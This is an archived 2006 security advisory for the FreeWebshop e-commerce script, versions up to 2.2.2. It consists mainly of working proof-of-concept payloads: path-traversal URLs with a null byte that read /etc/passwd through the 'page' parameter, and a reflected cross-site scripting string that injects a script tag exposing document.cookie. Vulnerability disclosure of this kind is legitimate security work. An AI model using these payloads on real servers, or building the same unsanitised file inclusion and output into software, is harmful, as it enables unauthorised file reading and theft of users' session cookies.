Home / os / winme

freewebshop222.txt

Posted on 09 November 2006

FreeWebshop <=2.2.2 severity: hight vendor site: http://www.freewebshop.org/ impact: an anonymous user can access anyfile on the remote server PoC : http://site.com/?page=../../../../../../../../../../etc/passwd%00 http://site.com/index.php?page=../../../../../../../../../../etc/passwd%00 xss get : http://www.site.com/demo/index.php?page=browse&action=list&group=8&cat=</textarea>'"><script>alert(document.cookie)</script> laurent gaffié & benjamin mossé http://s-a-p.ca/ contact: saps.audit@gmail.com

 

TOP